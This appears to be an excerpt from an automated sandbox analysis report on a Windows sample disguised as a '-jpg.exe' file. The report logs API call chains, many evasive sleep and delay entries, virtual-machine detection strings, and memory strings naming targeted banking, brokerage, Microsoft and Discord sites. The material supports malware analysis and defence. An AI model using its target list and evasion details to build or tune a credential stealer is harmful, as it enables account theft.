                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597357Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597141Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596916Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595106Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7763Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2082Jump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-77460
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeAPI coverage: 3.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 6.2 %
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7160Thread sleep count: 7763 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7160Thread sleep count: 2082 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599438s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598735s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597610s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597357s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597250s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597141s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -597031s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596916s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596813s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596688s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596578s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596469s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596344s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596234s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -596016s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595796s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595688s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595563s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595344s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595219s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595106s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -595000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -594891s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -594781s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -594672s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -594563s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -594438s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 1036Thread sleep time: -594328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597357Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597141Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596916Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595106Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594328Jump to behavior
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000002.2200035684.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4638670230.000000000326D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.web>
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006849000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: svchost.exe, 00000002.00000002.4641266057.0000000006814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
